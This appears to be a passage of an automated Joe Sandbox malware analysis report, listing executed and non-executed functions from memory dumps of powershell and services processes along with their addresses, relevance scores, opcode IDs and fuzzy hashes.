                                                                                                      • Source File: 00000013.00000002.3310950991.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b76d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0e9468a6a1206176dee9b2082bc45085a7d7212bc9f150be9ed93457da9a0522
                                                                                                      • Instruction ID: 8160d619dc93d1cd3ff729202615d9e65d83f53502e83eb291733673fdeeb1b2
                                                                                                      • Opcode Fuzzy Hash: 0e9468a6a1206176dee9b2082bc45085a7d7212bc9f150be9ed93457da9a0522
                                                                                                      • Instruction Fuzzy Hash: ED41087140EBC88FE7568B3898559623FF0EF56320B1606DFD089CB1B7D625A845C7A3

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B96660A Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3267420083.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b960000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: X7Re
                                                                                                      • API String ID: 0-3146555717
                                                                                                      • Opcode ID: 1c2700161435521fcc2757e91ef8e90a688e89b1b6f1cc2c59ed391d6f8c4711
                                                                                                      • Instruction ID: d711e24d9fd33ff62194a0ea3e9cc5e30619cd7f7fa6a453f7632bf72eb14361
                                                                                                      • Opcode Fuzzy Hash: 1c2700161435521fcc2757e91ef8e90a688e89b1b6f1cc2c59ed391d6f8c4711
                                                                                                      • Instruction Fuzzy Hash: FAC13732A2FA8E9FEBA9DB6858655B57BD0EF56310F0901BED05DC70E3DA18A9018341
                                                                                                      Function 00007FFD9B96662A Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3267420083.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b960000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: X7Re
                                                                                                      • API String ID: 0-3146555717
                                                                                                      • Opcode ID: f895dc6ac39cb553d56006508f9ec8abd0bcf6ff402e982849b251383add5903
                                                                                                      • Instruction ID: 8e7f44d88a56034769cf878794015afe3c7e2a90f9cbd77a28f5037734c9889c
                                                                                                      • Opcode Fuzzy Hash: f895dc6ac39cb553d56006508f9ec8abd0bcf6ff402e982849b251383add5903
                                                                                                      • Instruction Fuzzy Hash: 84810722A2FBCA9FEBB597A848745B47BD1EF16300B4A01FED05DCB0E7D918AD058341
                                                                                                      Function 00007FFD9B89604D Relevance: .4, Instructions: 386COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3255569514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 11f403ccfbf917192e01b7da2da6dc35bd091d99f432eec61fc6d4626ce65a35
                                                                                                      • Instruction ID: 3ac518922fb6a7500ca514f406fde1436b7c5109de3f22f657052a9be8d26fae
                                                                                                      • Opcode Fuzzy Hash: 11f403ccfbf917192e01b7da2da6dc35bd091d99f432eec61fc6d4626ce65a35
                                                                                                      • Instruction Fuzzy Hash: 2711706190E7CA8FDB179B7898745E53FB0EF17244B0A01E7D489CB0B3DA186949C752
                                                                                                      Function 00007FFD9B899718 Relevance: .2, Instructions: 159COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3255569514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 97aeb4f2f6d036f1418851def8518c89c0fffe57c2a38c66b8cea2f99337f8fd
                                                                                                      • Instruction ID: 833abe1cad6da26d2646773b31590eb9d20fb34dde014fe0a9020153d807475a
                                                                                                      • Opcode Fuzzy Hash: 97aeb4f2f6d036f1418851def8518c89c0fffe57c2a38c66b8cea2f99337f8fd
                                                                                                      • Instruction Fuzzy Hash: E6417931A0DA888FDB199FAC58196A87FE0FF56710F04417FE098C3293DA24B945CBC2
                                                                                                      Function 00007FFD9B77EE24 Relevance: .1, Instructions: 125COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3243437061.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b77d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a7fb07c345f3837613cfc5ef6d1b8d8bbbc988837bb969118c786a0effeba180
                                                                                                      • Instruction ID: f08b3420c32a2bf01ae7a8e5a095fce77a7d3666c22fcf2411ba0e1f16c71182
                                                                                                      • Opcode Fuzzy Hash: a7fb07c345f3837613cfc5ef6d1b8d8bbbc988837bb969118c786a0effeba180
                                                                                                      • Instruction Fuzzy Hash: 4741277140EBC84FE7569B3898559523FF0EF53320B1A06EFD088CB5B3D665A846C792
                                                                                                      Function 00007FFD9B89A64C Relevance: .1, Instructions: 100COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3255569514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 25c639de28e9ddaab4022d00c2b7e79cf391b6fb6fc6ea3cd1f1a35243d3508a
                                                                                                      • Instruction ID: 1fc59d137c7162e66c24fefc1138fe2fe91901e5beb853c5e3a7089b1ec489ad
                                                                                                      • Opcode Fuzzy Hash: 25c639de28e9ddaab4022d00c2b7e79cf391b6fb6fc6ea3cd1f1a35243d3508a
                                                                                                      • Instruction Fuzzy Hash: AA21F83190C74C4FDB59DF9C984A7E97FE0EB96321F04416BD048C3156DA74945ACB91
                                                                                                      Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3255569514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                      Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3267420083.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b960000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bcf4a256106f3ed77f2f0f4437679d8e3887d0beaa3ed2a55cb5bdc172ca55f0
                                                                                                      • Instruction ID: 3ee01aa1ee4f249140ad01f0d4fefc00b610b1a53fe11b21888b6c71c9dc1ccf
                                                                                                      • Opcode Fuzzy Hash: bcf4a256106f3ed77f2f0f4437679d8e3887d0beaa3ed2a55cb5bdc172ca55f0
                                                                                                      • Instruction Fuzzy Hash: 9DF0BE32B0E5098FD769EB9CE4519E873E0EF6532071600BAE06DC72B3CA25EC41C741
                                                                                                      Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3267420083.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b960000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5b22c87fda121f4224ec020b6714e9a505c52030f796a912bf66c3c9b1899567
                                                                                                      • Instruction ID: f1e379c35b759b49d4585623247d704a31df64305c80a1af140877baf23d6d7a
                                                                                                      • Opcode Fuzzy Hash: 5b22c87fda121f4224ec020b6714e9a505c52030f796a912bf66c3c9b1899567
                                                                                                      • Instruction Fuzzy Hash: 75F0BE32B0E5498FD765EB9CE0619A873E0EF0532070600BAE05DCB1B3CA26AC40C750
                                                                                                      Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3267420083.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b960000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80
                                                                                                      Function 00007FFD9B89A2C9 Relevance: .0, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3255569514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1c840c991501e7be4669e7a91bf308631d9dfef5bc329dba03eb946d8fe00010
                                                                                                      • Instruction ID: 8c9cddaed84f325c485bcda86a76cabf544e5b67ade7e48303af95b0bf5ab05c
                                                                                                      • Opcode Fuzzy Hash: 1c840c991501e7be4669e7a91bf308631d9dfef5bc329dba03eb946d8fe00010
                                                                                                      • Instruction Fuzzy Hash: 53E01234804A8C8F8B48EF18C8598E97BA0FF68201B01429BE81DC7520DB719A58CBC2

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FFD9B8984E3 Relevance: 6.4, Strings: 5, Instructions: 116COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3255569514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                      • API String ID: 0-2396788759
                                                                                                      • Opcode ID: 39a97a9bf94251570bc9cfc155614a29148db1155aca984bce772aa008548c34
                                                                                                      • Instruction ID: 04e0bf2909d959ca24a82db53d32df008b3126608ec03bbc25455c2952a09601
                                                                                                      • Opcode Fuzzy Hash: 39a97a9bf94251570bc9cfc155614a29148db1155aca984bce772aa008548c34
                                                                                                      • Instruction Fuzzy Hash: 6C316F53E0F6D75BEB63077958790947F90EE57AA431F03E6C0E88B0A3FD04A94B8241

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B8B0DA0 Relevance: .3, Instructions: 293COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3dbf6d9ca80413403d34f4a434ba13af8a81be109c3f75dae46cfa5da0acb8b0
                                                                                                      • Instruction ID: 9b8d3f8eea829dc58c7be66b50e86e6dc84428a631ac9ae56432598d370a193c
                                                                                                      • Opcode Fuzzy Hash: 3dbf6d9ca80413403d34f4a434ba13af8a81be109c3f75dae46cfa5da0acb8b0
                                                                                                      • Instruction Fuzzy Hash: 66A1F6B0A28A9D8FD798DBA8D8657A97FE1FF59700F4001BAD049D72E6CB781801CB41
                                                                                                      Function 00007FFD9B8B0B3F Relevance: 3.8, Strings: 3, Instructions: 78COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: c9$!k9$"s9
                                                                                                      • API String ID: 0-3426396564
                                                                                                      • Opcode ID: 1362ab46e735cd035845962a2a6e1d6fab9c5b456af91076706fbaa2f21062da
                                                                                                      • Instruction ID: ec2170175067d79a8758d4bb305256bea5cf699cf96c0440a089e2801bbb0d0d
                                                                                                      • Opcode Fuzzy Hash: 1362ab46e735cd035845962a2a6e1d6fab9c5b456af91076706fbaa2f21062da
                                                                                                      • Instruction Fuzzy Hash: 4721CF36B2864E8FCB45EF6CE8415E977A0FB99369F15017BE809C3261D330A526CBC1
                                                                                                      Function 00007FFD9B8BAE5E Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$)
                                                                                                      • API String ID: 0-2010264150
                                                                                                      • Opcode ID: 3308cde31ef4d6de54b64582d313fdeb7604eb99509ed6445aea93a37d142dae
                                                                                                      • Instruction ID: 1cbc0a30a7a77b9c7bf69d6b559153ad2efb776b704b0471cdae39169af0dd96
                                                                                                      • Opcode Fuzzy Hash: 3308cde31ef4d6de54b64582d313fdeb7604eb99509ed6445aea93a37d142dae
                                                                                                      • Instruction Fuzzy Hash: 9C21EA70E1652E8EEBB4EB68C8587E9B2B0FF18301F1041F9D40DA6291DB785AC4CF41
                                                                                                      Function 00007FFD9B8B09B0 Relevance: .2, Instructions: 205COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08ffce1df1fe210c24f208234249da710978bd7d779c64e1ca7dbf4cfded5177
                                                                                                      • Instruction ID: ee3b77cd819de5dd24323959b9704cbcc8368751bf1c6d384b81da3ac77d4ab1
                                                                                                      • Opcode Fuzzy Hash: 08ffce1df1fe210c24f208234249da710978bd7d779c64e1ca7dbf4cfded5177
                                                                                                      • Instruction Fuzzy Hash: 59513862B0813A8AD71A7BBCB8259FD7B50EF4536CB0846B7E05D870D7DD68A08297C1
                                                                                                      Function 00007FFD9B8B090D Relevance: .2, Instructions: 168COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 79a935ce678145e305d8e7cb95a9e5a737b2c042c804f3dedd4eb541c98bc170
                                                                                                      • Instruction ID: c074ab3c342adb133546298287ae7ad870d3674798ba46c6248c0a610c4ec9a6
                                                                                                      • Opcode Fuzzy Hash: 79a935ce678145e305d8e7cb95a9e5a737b2c042c804f3dedd4eb541c98bc170
                                                                                                      • Instruction Fuzzy Hash: 4D517F71A1895D8FDB59FBA8E4A5AECB7A0FF48314F00017BD009D71A6DE34A4418781
                                                                                                      Function 00007FFD9B8B08E8 Relevance: .2, Instructions: 152COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 242ad318d1651992fb43f550420b1120500e9b897285ff105024508976d3a20d
                                                                                                      • Instruction ID: 7b1840899f9cba0deb06aa85631b3bc87e5274cd9358e61a39e07113728a7475
                                                                                                      • Opcode Fuzzy Hash: 242ad318d1651992fb43f550420b1120500e9b897285ff105024508976d3a20d
                                                                                                      • Instruction Fuzzy Hash: C851B070A0891E9FCF54EF98D894AED7BF1FF58315F05016AE419E72A1DA34E981CB80
                                                                                                      Function 00007FFD9B8B3565 Relevance: .1, Instructions: 133COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c6123e713238d2570ec465d092825dd580f4742103f1331d23ac74e70f5a2ed1
                                                                                                      • Instruction ID: 1b106469faf8de14a452992f36baf24b8328073c5d0a399d3a93c4b6a414c3e2
                                                                                                      • Opcode Fuzzy Hash: c6123e713238d2570ec465d092825dd580f4742103f1331d23ac74e70f5a2ed1
                                                                                                      • Instruction Fuzzy Hash: 8651BC74E1952D8EDBA4DF14C898BA9B7F0FB68301F5041EAD00DE22A5DF386A84CF41
                                                                                                      Function 00007FFD9B8B0998 Relevance: .1, Instructions: 124COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ef4855ce17af6a8a2df1de8f35e598f1f5624df4b8f7c34d43ae94f5b52f4ffd
                                                                                                      • Instruction ID: 513153c1cab70c2912595dcca723cd1b42af79763bf28d25e0910d5c994cdde1
                                                                                                      • Opcode Fuzzy Hash: ef4855ce17af6a8a2df1de8f35e598f1f5624df4b8f7c34d43ae94f5b52f4ffd
                                                                                                      • Instruction Fuzzy Hash: AF416F70A14A5D8FEB94EFA8D495AEDBBF1FF58344F00016AD409E7295DB34A841CB41
                                                                                                      Function 00007FFD9B8B5AA6 Relevance: .1, Instructions: 122COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e9fdca817729992dd094e01fdaa31bc698fd8d61b97a14f560f793a1e847b12f
                                                                                                      • Instruction ID: 3dba2e68ae36a56c02259112eec202fd9a84384399fe45ece9a43f3fc4efbb62
                                                                                                      • Opcode Fuzzy Hash: e9fdca817729992dd094e01fdaa31bc698fd8d61b97a14f560f793a1e847b12f
                                                                                                      • Instruction Fuzzy Hash: FC51EC34E1996D8EEBB4DB64CC647E9B3B5EB48301F1542F5D00DA2291DF356AC58F80
                                                                                                      Function 00007FFD9B8B5CB0 Relevance: .1, Instructions: 100COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c897ee4217f11074f415e524c3fc7731f10347df1419d46eb077e3816a563b31
                                                                                                      • Instruction ID: 8f3ecfe66bcfd110940dba257c3c4d7d5c78e413f8656cc02400873421427409
                                                                                                      • Opcode Fuzzy Hash: c897ee4217f11074f415e524c3fc7731f10347df1419d46eb077e3816a563b31
                                                                                                      • Instruction Fuzzy Hash: DA41CD70E1552D8EEBA4DF25C8A9BE8B3B1EB58305F0542E9D04DA72A1DF346AC5CF40
                                                                                                      Function 00007FFD9B8B0C25 Relevance: .1, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 20cc32ece13de63203ede6f9e18df3da6885a0993375557de82024330bc389f8
                                                                                                      • Instruction ID: 3a02d9aa6f60225995aaf4f453e8e2a8e7747ba6f73987135b4c35a40664b863
                                                                                                      • Opcode Fuzzy Hash: 20cc32ece13de63203ede6f9e18df3da6885a0993375557de82024330bc389f8
                                                                                                      • Instruction Fuzzy Hash: 6E21F736B0E29D8EE71297B9DC211ED7B60EF46311F0545B3C044DB1E2D638260ACBD1
                                                                                                      Function 00007FFD9B8B36E9 Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 75edd9be219b34e7f12ddd7a724a600cb2cecc9d57a470424baacdb8fb41378a
                                                                                                      • Instruction ID: f11fad92d67bef529c6cabbb68d4c024a0239f07888c3787a78c428000246aa8
                                                                                                      • Opcode Fuzzy Hash: 75edd9be219b34e7f12ddd7a724a600cb2cecc9d57a470424baacdb8fb41378a
                                                                                                      • Instruction Fuzzy Hash: A3319C31E1892C9FDBA4DF14C895AE973F1FB69301F5041EA900EE3265DE75AA80CF42
                                                                                                      Function 00007FFD9B8B35FA Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bdc7e26a3eb7286384c790b3cd6f365e686fb63dadddc320e7e6839a763a55f3
                                                                                                      • Instruction ID: 51789535502ed394d7b08ce83aea820a67d21609cf5f27e7ba9a3f1467f2fd79
                                                                                                      • Opcode Fuzzy Hash: bdc7e26a3eb7286384c790b3cd6f365e686fb63dadddc320e7e6839a763a55f3
                                                                                                      • Instruction Fuzzy Hash: 9931BB31E0892C9FCF94DF14C895AE973F0FB69301F5011DA900EE3265DA75AA84CF42
                                                                                                      Function 00007FFD9B8B5CFB Relevance: .1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 469dbeb7656e77e4757d1335b4d60460afaab5d7e5843d0bb12bcb9b3648f269
                                                                                                      • Instruction ID: 673a009a13592ce3648cccdb7222e15078e74c8847f4c5bbf69d1599ef1b028e
                                                                                                      • Opcode Fuzzy Hash: 469dbeb7656e77e4757d1335b4d60460afaab5d7e5843d0bb12bcb9b3648f269
                                                                                                      • Instruction Fuzzy Hash: 7131B974D1952D8EFBB4DF65C8A4BE9B7B1AB58301F1042E9D00DA22A1DF786AC5CF40
                                                                                                      Function 00007FFD9B8B5C22 Relevance: .1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c75fff72a2c25ab68619075bc39d74c1c97d054aaa31c29e71578979afcfef57
                                                                                                      • Instruction ID: 47ecd03bdef93c35e296d5bc0160c26bb3a713ea43e35cd25c643cdef77ceb81
                                                                                                      • Opcode Fuzzy Hash: c75fff72a2c25ab68619075bc39d74c1c97d054aaa31c29e71578979afcfef57
                                                                                                      • Instruction Fuzzy Hash: 0131EE74E1962D8EEB64DF25CCA4BE9B3B1EB58301F0542F9D00D962A1DF356AC58F40
                                                                                                      Function 00007FFD9B8B0C38 Relevance: .1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
